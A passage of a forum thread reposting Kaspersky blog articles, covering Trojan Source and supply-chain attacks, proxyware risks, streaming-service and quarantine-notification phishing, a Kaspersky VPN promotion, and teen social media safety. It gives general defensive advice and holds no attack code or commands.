    The problem is real, but fortunately the solution is quite simple. All patches already out or expected soon will block the compilation of code containing such characters. (See, for example, this security advisory from the developers of the Rust compiler.) If you use your own software build tools, we recommend adding a similar check for hidden characters, which should not normally be present in source code.

    The danger of supply-chain attacks

    Many companies outsource development tasks to contractors or use ready-made open-source modules in their projects. That always opens the door to attacks through the supply chain. Cybercriminals can compromise a contractor or embed code in an open-source project and slip malicious code into the final version of the software. Code audits typically reveal such backdoors, but if they don’t, end users may get software from trusted sources but still lose their data.

    Trojan Source is an example of a far more elegant attack. Instead of trying to smuggle megabytes of malicious code into an end product, attackers can use such an approach to introduce a hard-to-detect implant into a critical part of the software and exploit it for years to come.

    How to stay safe

    To guard against Trojan Source–type attacks:

    • Update all programming language compilers you use (if a patch has been released for them), and
    • Write your own scripts that detect a limited range of control characters in source code.

    More broadly, the fight against potential supply-chain attacks requires both manual code audits and a range of automated tests. It never hurts to look at your own code from a cybercriminal perspective, trying to spot that simple error that could rupture the whole security mechanism. If you lack the in-house resources for that kind of analysis, consider engaging outside experts instead.

    View the full article

  20. Imagine getting paid for access to just a tiny portion of your Internet bandwidth at work. Sounds pretty sweet, doesn’t it? The computer is on all the time anyway, and you have unlimited Internet access, so why not? It’s not even your own resources, just corporate equipment and bandwidth.

    That all sounds simple, but you don’t have to look too closely to see that when you agree to install a proxyware client on a work computer, it’s not harmless at all. Install proxyware and you’re exposing your corporate network to risks that far outweigh any income you might earn from the deal. To put it bluntly, no other questionable Internet money-making scheme comes with such a variety of undesirable consequences. Today we explain why proxyware is dangerous.

    What is proxyware?

    Researchers at Cisco Talos coined the term proxyware and have reported on the phenomenon in depth. Essentially, a proxyware service acts as a proxy server. Installed on a desktop computer or smartphone, it makes the device’s Internet connection accessible to an outside party. Depending on how long the program remains enabled and how much bandwidth it is permitted to use, the client accumulates points that can eventually be converted into currency and transferred to a bank account.

    Of course, these kinds of services do not have to be used for illegal purposes, and they do have some legitimate applications. For example, some appeal to the marketing departments of large companies, which need as many Web entry points as possible in different geographic regions.

    Why proxyware on a company computer is a bad idea

    Although proxyware services claim “tenants” are harmless, problems sometimes still occur, including IP address reputation damage and software reliability.

    Pessimization of the IP address

    The most common problem with proxyware for the users of the computers on which it runs — or even for the entire network if it has a single IP address — is that the services often encounter CAPTCHAs, whose entire point is to ensure only real humans can get access to an online resource. A computer with proxyware raises suspicions, and rightly so.

    One way bandwidth tenants can use proxyware-laden computers is to scan the Web or measure the speed of website access by regularly deploying a flood of requests. Automatic DDoS protection systems do not like that. It can also be a sign of something even more shady, such as spam mailings.

    Keep in mind that the consequences can be much more dire for the company, with automated requests landing the organization’s IP address on a list of unsafe addresses. So, for example, if the e-mail server operates on the same address, at some point the employees’ messages may stop reaching external recipients. Other e-mail servers will simply start blocking the organization’s IP address and domain.

    Fake proxyware clients

    Another risk employees take in installing proxyware is that they may download something they didn’t mean to. Try this little experiment: Go to Google and search for “honeygain download.” You’ll get a couple of links to the developer’s official website and hundreds to unscrupulous file-sharing sites, half of which include “bonus content” with their downloads.

    What kinds of bonus content? Well, researchers describe one such trojanized installer as deploying a cryptocurrency-mining program (which devour a PC’s resources and electricity) and a tool to connect to the cybercriminals’ command server, from which anything else can be downloaded at any time.

    That kind of proxyware can take down an organization’s entire IT infrastructure. It could also lead to ransomware encrypting data, ransom demands, and more. In sum, proxyware is a grab bag of dangers for a business.

    Covert installation of proxyware

    Most scenarios resemble the above: unintended consequences of purposeful (if sometimes unauthorized) installations. The converse sometimes happens as well, with an employee catching actual malware on a shady site, and that malware installing a modified proxyware client on the computer. That’s nothing but trouble: slowed computers, less network bandwidth, and, potentially, data theft.

    Recommendations for businesses

    Your best way to combat criminal exploitation through proxyware is to install a reliable antivirus solution on every computer that has Internet access. Not only will that protect your company from the harmful effects of proxyware, but if said proxyware includes, or is included with, other malware, you’ll still be covered.

    To be clear, even “clean” proxyware is not much better. A sound security policy should not allow anyone to install proxyware or any other questionable software on employees’ computers, regardless of whether the computers are in the office or employees are connecting to the organization’s VPN. As a rule, most employees do not need, and should not be allowed, to install software on their computers independently.

    View the full article

  21. This week on the Kaspersky Transatlantic Cable podcast, we take a look at some serious stories, including news of REvil arrests.

    To kick off the conversation, Dave, Jeff, and Ahmed jump on news that some folks on Twitter are trying to be good cops, hunting down cryptoscammers in the DeFi (decentralized finance) world, but not all is as it appears. From there, discussion moves on to how a scammer was able, briefly, to hit the number one spot in Google results for “OpenSea” — which is a legitimate site for the trading of NFTs. As ever, be wary of clicking without checking!

    Finally, to wrap up, the team looks at two stories about ransomware: the first on the return of Emotet and the second looking at the recent arrest of an affiliate related to the REvil ransomware gang.

    If you liked what you heard, please consider subscribing and sharing with your friends. For more information on the stories we covered, see the links below:

     

    button-subscribe-apple.pngbutton-subscribe-spotify.pngbutton-subscribe-google.pngbutton-subscribe-rss.png

     

    View the full article

  22. Movies and TV shows have been a huge source of comfort for many in these COVID times, and the number of new shows on Netflix, Amazon Prime, and the like has skyrocketed. But when searching for the latest megahit, don’t neglect basic security measures or you might find that someone else is enjoying it at your expense — or worse, that the money in your bank account has evaporated.

    It’s more fun to ponder what to watch next than to dig through security settings, but attackers are ready and waiting to siphon off your personal and payment information.

    Phishing bait

    Streaming services offer a variety of payment plans, but generally they all involve paying with a credit card. And where there are card details, there is phishing. What’s more, newbies and seasoned account holders may experience different forms of bait. We collected some examples from users who agreed to share threat information.

    “Subscribe now!”

    To sign up for a streaming service, you need a valid e-mail address; and to pay, you need some form of online payment such as a credit card or PayPal account. (If you plan to watch Apple TV, you’ll also need an Apple ID.)

    Unsurprisingly, cybercriminals have created fake sign-up pages to net all of those goodies in one go. Armed with your info, they can withdraw or spend your money right away; your e-mail address should come in handy for future attacks.

    In the example below, the fake site is not very convincing. Can you spot the phishing signs?

    Fake Netflix sign-up page

    Fake Netflix sign-up page

    “Refresh data”

    If you already have a paid subscription, then attackers will threaten to block it, assuming, logically, that you value it. Here’s an e-mail from “friends at Netflix,” telling the recipient to update or confirm payment details or they’ll close the account. And it includes a big, red button. Don’t rush to click that — remember what happens in the movies when they push the big, red button?

    netflix-phishing-screen-2.jpg

    “Dear costumer, please update your account”

    The link takes you to a payment confirmation page.

    Now, many phishing messages contain such obvious mistakes as addressing “costumers,” but take the form below as an example that actually looks plausible. It has no spelling mistakes or weird design elements, but the inattentive user who falls for it could lose money from their bank account.

    Fake Netflix website prompts to enter personal and banking data, allegedly for account reactivation

    Fake Netflix website prompts to enter personal and banking data, allegedly for account reactivation

    A dangerous premiere

    In the example below, cybercriminals used popular shows to attract fans who didn’t have subscriptions, offering them the opportunity to watch the shows on the fake website.

    This unofficial page invites fans to watch or download The Mandalorian

    This unofficial page invites fans to watch or download The Mandalorian

    As a teaser, they show a short clip, which they sometimes try to pass off as a new, previously unaired episode. More often than not, it is cut from trailers that have long been in the public domain. Intrigued victims are then asked to buy a low-cost subscription to continue watching. What follows is a classic scenario: Any payment details users enter go straight to the crooks, and the never-before-seen episode remains such.

    No longer your account

    Cybercriminals are interested in more than bank account details; account credentials for streaming services are also hot. Because hijacked accounts with paid subscriptions get put up for sale on the dark web, you could log in one day and discover someone else is already there.

    After all, depending on your Netflix plan, you can stream on 1–4 devices simultaneously, and cybercriminals can sell your login credentials to any number of streamers. That means you might find yourself having to wait in line until some stranger decides to sign out.

    This fake Netflix login page looks just like the real one

    This fake Netflix login page looks just like the real one

    That may not be the end of it, either: Many people use the same password for different accounts, and databases of stolen passwords die hard. If their password is the same everywhere, the victim need only enter it on a phishing page once.

    Buy a subscription for yourself, not cybercriminals

    Cybercriminals scam movie and TV show lovers in different ways. Some of their ruses are quite easy to spot, others less so. By following simple digital security rules, you can protect your data not only in online movie theaters, but elsewhere as well.

    • Do not click links in e-mails, even if a message seems to be from a real streaming (or other) service; always go to the official website by entering the address manually or through the app;
    • Do not trust any person or site promising viewings of movies or shows before the official premiere;
    • Pay attention to red flags that warn of phishing e-mails or fake websites;
    • Stay alert and read more about scams and phishing schemes to learn how to sense which e-mails and websites are trustworthy, and which you should avoid;
    • Use different passwords for all accounts that you value, and use a password manager to remember them for you;
    • Use a reliable security solution that identifies malicious attachments and blocks phishing websites.

    View the full article

  23. What do you do when an unsolicited e-mail lands in your work inbox? Unless you’re a spam analyst, you will most certainly probably just delete it. Paradoxically, that’s exactly what some phishers want you to do, and as a result, our mail traps have been seeing more and more e-mails lately that appear to be notifications about obviously unwanted messages.

    How it works

    Cybercriminals, relying on users’ inexpert knowledge of antispam technologies, send notifications to company employees about e-mails that allegedly arrived at their address and were quarantined. Such messages look something like this:

    Fake notification about quarantined e-mails.

    Fake notification about quarantined e-mails.

    The choice of topic is generally unimportant — the attackers simply copy the style of other advertising for unsolicited goods and services and provide buttons for deleting or keeping each message. It also provides an option to delete all quarantined messages at once or to open mailbox settings. Users even receive visual instructions:

    Visual instructions sent by scammers.

    Visual instructions sent by scammers.

    What’s the catch?

    The catch, of course, is that the buttons are not what they seem. Behind every button and hyperlink lies an address that brings the clicker to a fake login page, which looks like the Web interface of the mail service:

    Phishing site.

    Phishing site.

    The message “Session Expired” is meant to persuade the user to sign in. The page serves one purpose, of course: to harvest corporate mail credentials.

    Clues

    In the e-mail, the first thing that should set alarm bells ringing is the sender’s address. If the notification were real, it would have to have come from your mail server, which has the same domain as your mail address, not, as in this case, from an unknown company.

    Before clicking any links or buttons in any message, check where they point by hovering the mouse cursor over them. In this case, the same link is stitched into all active elements, and it points to a website that has no relation to either the domain of the recipient or the Hungarian domain of the sender. That includes the button that supposedly sends an “HTTPs request to delete all messages from quarantine.” The same address should serve as a red flag on the login page.

    How to avoid spam and phishing

    To avoid getting hooked, corporate users need to be familiar with the basic phishing playbook. For this, look no further than our online security awareness platform.

    Of course, it is better to prevent encounters between end users and dangerous e-mails and phishing websites in the first place. For that, use antiphishing solutions both at the mail server level and on users' computers.

    View the full article

  24. Millions of people around the world already use a VPN app (and if you’re not one of them, now’s the time to try). Some do so to protect the data they transfer, others want to hide their IP address or virtually change location, for example to watch movies and TV shows that are not available in their country. Every one of those core features is important, and we never stop working to ensure that Kaspersky VPN Secure Connection handles them all perfectly. In this post, we’re diving in to the latest updates to our application.

    More choice, more speed

    One of the most important parameters of a VPN connection is speed. In terms of data transfer speed, Kaspersky VPN Secure Connection is a market leader, as independent reports confirm. Our solution handles streaming video, downloading files, and connecting to game servers particularly well.

    Normally, the closer you are to the server, the faster the connection. That’s why we continually expand our network of servers — with excellent results. In the past year alone, for example, we have expanded our server count to 2,000, and with servers across 55 countries, you are sure to find a super-fast connection.

    What’s more, to achieve maximum speed, you don’t need to choose manually from a list of options — the paid version of the app automatically determines which server offers the best connection speed and connects to it. If the automatic selection doesn’t suit you, you can connect to another point, choosing a country or even a particular city.

    Content from any country is always available

    For those who subscribe to Netflix but miss their favorite TV shows because they’re not available in certain countries, Kaspersky VPN Secure Connection also lets users watch such content. They just have to connect to the right server.

    Our solution lets you select not only countries, but also streaming platforms. In addition to Netflix, you can enjoy local content from Amazon Prime Video, HBO Max, Hulu, Disney+, and BBC iPlayer as if you were physically in the US, UK, Germany, or Japan.

    New features to keep you safe

    It should go without saying that your security remains our top priority. To ensure your protection at all times, Kaspersky VPN Secure Connection turns on automatically when you connect to public networks or run certain programs, such as banking apps. The solution applies AES-256 encryption to all traffic to prevent data interception.

    And when we say all traffic, we mean every byte of data: The Kill Switch feature blocks data transmission until a secure connection is established and prevents all interception attempts in any situation — for example, when you connect to a hotspot and your device comes online, but the data transmission channel is not yet secure.

    We have supplemented Kaspersky VPN Secure Connection with the ability to set up a secure connection not only directly on your phone or laptop, but also on the router, using the built-in OpenVPN client. In such cases, the solution automatically protects traffic sent from all devices in your network, meaning you don’t have to configure the service for each individually. It also means that the secure connection will work for your smart TV, letting you watch content available only in other countries.

    Now you can also use our secure connection on any device that supports an OpenVPN client, which covers, for example, Linux machines and Chromebooks in addition to smart TVs with Android TV or Fire TV.

    Trust and privacy

    When it comes to privacy, trust in the makers of your security solution is paramount. What information do the developers collect about you? How do they use it? If a company is not ready to answer these questions, think twice before placing your safety in its hands.

    Kaspersky has been in the information security market for almost 25 years. We maintain maximum operational transparency and do not collect unnecessary data. In particular, Kaspersky VPN Secure Connection does not store your IP address outside the session, never records your Internet activity, and does not retain your name and e-mail address.

    Our recent report on data processing describes in detail how and what we collect, store, and process; and, in line with the highest security standards, we reliably protect all of the user information we receive.

    The trust of our millions of users worldwide is very important to us, and their feedback helps us further develop our applications. This approach is bearing fruit: Kaspersky VPN Secure Connection scores 4.5 out of 5 on Google Play and 4.7 out of 5 in the App Store based on thousands of reviews. Reviews in specialized publications also confirm the superior protection of our solutions and the openness of our data-processing policy.

    Security that doesn’t break the bank

    Change is good, but so is stability. Therefore, we left some things unaltered: As before, Kaspersky Secure Connection costs less than most other solutions in its class.

    A completely free version of our solution is also available. It limits daily traffic and lacks some advanced features such as server selection and Kill Switch but still does a great job of protecting your connection.

    View the full article

  25. We recently observed World Mental Health Day, an international holiday that highlights the importance of mental health in an effort to bring about positive change. Adolescents’ mental health deserves extra attention in our era of social media, about which questions have been raised over psychological addiction and other problems.

    Social media anxiety

    A recent Facebook study found that Instagram can harm the psyche of teens, especially girls. Thirty-two percent of teenage girls said that when they felt bad, Instagram made them feel even worse. Among the frequently cited causes of stress were unrealistic standards of beauty and feelings of inadequacy about their standard of living compared to those shown on the screen.

    Instagram is trying to deal with some of these problems by introducing various functions to do things like hiding the likes counter or prohibiting filters that demonstrate unrealistic beauty standards.

    There are also simple steps users can take:

    • Unsubscribe from accounts that make you feel sad, inadequate, unconfident or upset.
    • Try to reduce the amount of time you spend online.
    • Take small breaks and digitally detox to escape from social networks, relax and focus on yourself. Kaspersky has launched a digital CyberSpa space, to help you do this.

    Cyberbullying

    Cyberbullying is another well-known issue that can affect a teen’s mental health. Whenever it happens, it should not be tolerated or ignored.

    If a teen is being bullied online, the first step is to seek help from parents or other trusted adults like a school counselor, sports coach or teacher. If the victim is uncomfortable telling friends about the problem, they can contact a helpline and talk to a professional consultant.

    Today, social networks, including Instagram, actively use AI to combat abusive comments under pictures and videos. Each social platform also has tools to customize who can comment on or view your posts, as well as to block users and report cases of bullying or intimidation. It can also sometimes be useful to collect evidence in the form of screenshots to confirm what is happening.

    Facebook

    Facebook has developed an Anti-Bullying Center for Teens. To fight against bullying on Facebook you can:

    • Track who tags you on their content. This can be done in the Chronicle & Tags settings.
    • Check already published materials with your tags, and, if necessary, remove them from materials you do not want to be associated with, using the Activity Log.
    • Remove the aggressors from your friends list so that they will not have the opportunity to contact you. And if deleting them does not help, you can block users. Remember they will not be notified of this. Blocking will prevent abusers from finding your profile and tagging your content. In addition, they will not be able to add you as a friend and track your actions.
    • Be sure to report offending materials to the support service. You can complain about content next to a post, photo or comment — this will draw the attention of Facebook moderators.

    Instagram

    Instagram tracks the content posted by users. If the platform sees possible violations, it will notify the user that they are about to publish information that crosses the boundaries. Others steps Instagram users can take include:

    Twitter

    Twitter also has an Online Bullying help center offering help and advice. Here are steps Twitter users can take to fight bullying:

    • Use Twitter’s expanded notification filters. These allow you to filter the accounts from which you receive notifications. For example, you may not receive notifications from users without a profile picture.
    • Twitter has a mute and notification option that you can customize to suit your needs. For instance, you can turn off notifications for keywords or entire phrases. You can turn off notifications for a day, a month, or indefinitely.
    • One effective step is also the option to block users. This will prevent blocked accounts from posting, seeing your tweets, and reading your feed.
    • If you are a victim of bullying, you should also report offending content. This will allow Twitter to act and block the user or content.

    TikTok

    TikTok is also creating various tools that allow users to limit unwanted attention. The company has produced a guide that helps to identify bullying behavior and take measures against it. Here are some features teens can use:

    • Configure video privacy settings on a personal account, to choose who can view each video and restrict the upload of personal videos.
    • The unwanted comments filter allows you to create a list of unwanted keywords that will be blocked in the comments on videos or during live broadcasts to protect users from bullying.
    • User filter allows you to choose who can add the Duet to a user video.
    • Blocking users makes it possible to block bullies who violate the community rules and notify the platform about their actions.
    • Family settings keep teens safe and support them in their creative endeavors without breaking personal boundaries.

    In its relatively short history, we’ve learned that social media may not always be beneficial for our mental health, even while it has other benefits. But by taking advantage of some of the tools at our disposal we can take matters into our own hands and help guide teens on a healthier path.

    View the full article

×
×
  • Create New...